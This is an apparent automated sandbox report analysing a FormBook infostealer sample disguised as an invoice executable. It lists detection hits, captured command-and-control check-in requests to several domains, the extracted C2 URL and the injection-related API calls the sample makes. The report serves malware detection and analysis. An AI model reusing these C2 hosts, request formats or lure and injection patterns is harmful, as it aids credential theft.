Source: Yara match	File source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: INVOICE_90990_PDF.exe

Joe Sandbox ML: detected

Source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: INVOICE_90990_PDF.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source:	Binary string: chkdsk.pdbGCTL source: INVOICE_90990_PDF.exe, 00000002.00000002.313490785.0000000000789000.00000004.00000020.sdmp
Source:	Binary string: C:\xampp\htdocs\Loct\3ec9815872b24c7398dfa8b3102e9d98\Loader\Project1\Release\Project1.pdb source: INVOICE_90990_PDF.exe
Source:	Binary string: chkdsk.pdb source: INVOICE_90990_PDF.exe, 00000002.00000002.313490785.0000000000789000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: INVOICE_90990_PDF.exe, 00000000.00000003.225868321.0000000003B40000.00000004.00000001.sdmp, INVOICE_90990_PDF.exe, 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, chkdsk.exe, 00000011.00000002.493007627.0000000004F0F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: INVOICE_90990_PDF.exe, chkdsk.exe, 00000011.00000002.493007627.0000000004F0F000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe

Code function: 0_2_004074A7 FindFirstFileExW,

0_2_004074A7

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 4x nop then pop ebx	2_2_00406A9A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 4x nop then pop edi	2_2_004162B5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 4x nop then pop edi	2_2_0040C3FE
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 4x nop then pop edi	2_2_00415682
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop edi	17_2_04CD5682
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop ebx	17_2_04CC6A9B
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop edi	17_2_04CD62B5
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 4x nop then pop edi	17_2_04CCC3FE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 1.1.1.1:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 1.1.1.1:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 1.1.1.1:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 184.168.131.241:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 184.168.131.241:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 184.168.131.241:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.microprojects.net/usvr/

Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=mSPJpO37iDi/JJOtFEB7cPoDq+rcFEXmmeg8f//WLLXT9MV2z86QjVFC/G6KvJkMQ56/&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.zombiguitar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=Hs/L2mJb/OvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.theblockmeatstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.quranvisor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=88iqZAUt96yR2rhEKdAsW+fIMlmUNDlEhlDMqrW0RE04oS4B75X1YpNyeqb0CjqVEbVs&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.unusualdog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91jHst47aV7F3&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.microprojects.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=SVmsrIRWYZxXscrAO9QNZyPvXLa+FThupnxYxRGhLcXdUbStD2hXLx2gyTP+PPpUbQNQ&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.bavarian-luxury.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 52.20.84.62 52.20.84.62

Source: Joe Sandbox View	ASN Name: PLI-ASCH PLI-ASCH
Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS

Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=mSPJpO37iDi/JJOtFEB7cPoDq+rcFEXmmeg8f//WLLXT9MV2z86QjVFC/G6KvJkMQ56/&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.zombiguitar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=Hs/L2mJb/OvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.theblockmeatstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.quranvisor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=88iqZAUt96yR2rhEKdAsW+fIMlmUNDlEhlDMqrW0RE04oS4B75X1YpNyeqb0CjqVEbVs&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.unusualdog.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91jHst47aV7F3&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.microprojects.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /usvr/?mN9d3vF=SVmsrIRWYZxXscrAO9QNZyPvXLa+FThupnxYxRGhLcXdUbStD2hXLx2gyTP+PPpUbQNQ&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1Host: www.bavarian-luxury.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.17391000.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 09 Aug 2021 11:10:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0

Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: INVOICE_90990_PDF.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample	Static PE information: Filename: INVOICE_90990_PDF.exe
Source: initial sample	Static PE information: Filename: INVOICE_90990_PDF.exe

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_004181D0 NtCreateFile,	2_2_004181D0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00418280 NtReadFile,	2_2_00418280
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00418300 NtClose,	2_2_00418300
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_004183B0 NtAllocateVirtualMemory,	2_2_004183B0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_004181CA NtCreateFile,	2_2_004181CA
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041818D NtCreateFile,	2_2_0041818D
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041827A NtReadFile,	2_2_0041827A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_004182FA NtClose,	2_2_004182FA
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_004183AA NtAllocateVirtualMemory,	2_2_004183AA
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C298F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_00C298F0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29840 NtDelayExecution,LdrInitializeThunk,	2_2_00C29840
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_00C29860
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C299A0 NtCreateSection,LdrInitializeThunk,	2_2_00C299A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_00C29910
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29A50 NtCreateFile,LdrInitializeThunk,	2_2_00C29A50
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_00C29A00
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29A20 NtResumeThread,LdrInitializeThunk,	2_2_00C29A20
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C295D0 NtClose,LdrInitializeThunk,	2_2_00C295D0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29540 NtReadFile,LdrInitializeThunk,	2_2_00C29540
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C296E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_00C296E0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_00C29660
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29FE0 NtCreateMutant,LdrInitializeThunk,	2_2_00C29FE0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29780 NtMapViewOfSection,LdrInitializeThunk,	2_2_00C29780
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C297A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_00C297A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29710 NtQueryInformationToken,LdrInitializeThunk,	2_2_00C29710
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C298A0 NtWriteVirtualMemory,	2_2_00C298A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C2B040 NtSuspendThread,	2_2_00C2B040
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29820 NtEnumerateKey,	2_2_00C29820
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C299D0 NtCreateProcessEx,	2_2_00C299D0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29950 NtQueueApcThread,	2_2_00C29950
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29A80 NtOpenDirectoryObject,	2_2_00C29A80
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29A10 NtQuerySection,	2_2_00C29A10
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C2A3B0 NtGetContextThread,	2_2_00C2A3B0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29B00 NtSetValueKey,	2_2_00C29B00
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C295F0 NtQueryInformationFile,	2_2_00C295F0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29560 NtWriteFile,	2_2_00C29560
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C29520 NtWaitForSingleObject,	2_2_00C29520
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C2AD30 NtSetContextThread,	2_2_00C2AD30
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C296D0 NtCreateKey,	2_2_00C296D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CD81D0 NtCreateFile,	17_2_04CD81D0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CD8280 NtReadFile,	17_2_04CD8280
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CD83B0 NtAllocateVirtualMemory,	17_2_04CD83B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CD8300 NtClose,	17_2_04CD8300
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CD81CA NtCreateFile,	17_2_04CD81CA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CD818D NtCreateFile,	17_2_04CD818D
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CD82FA NtClose,	17_2_04CD82FA
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CD827A NtReadFile,	17_2_04CD827A
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 17_2_04CD83AA NtAllocateVirtualMemory,	17_2_04CD83AA

Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_004034A6	0_2_004034A6
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_004041EF	0_2_004041EF
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_004039A2	0_2_004039A2
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_00403DBA	0_2_00403DBA
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_00404624	0_2_00404624
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 0_2_0040D3BD	0_2_0040D3BD
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041B84B	2_2_0041B84B
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041CA15	2_2_0041CA15
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00408C6F	2_2_00408C6F
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00408C70	2_2_00408C70
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_0041BC91	2_2_0041BC91
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00402D87	2_2_00402D87
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BFB090	2_2_00BFB090
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C120A0	2_2_00C120A0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB20A8	2_2_00CB20A8
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CA1002	2_2_00CA1002
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BEF900	2_2_00BEF900
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C04120	2_2_00C04120
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB22AE	2_2_00CB22AE
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C1EBB0	2_2_00C1EBB0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB2B28	2_2_00CB2B28
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BF841F	2_2_00BF841F
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00C12581	2_2_00C12581
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BFD5E0	2_2_00BFD5E0
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00BE0D20	2_2_00BE0D20
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB1D55	2_2_00CB1D55
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB2D07	2_2_00CB2D07
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe	Code function: 2_2_00CB2EF7	2_2_00CB2EF7
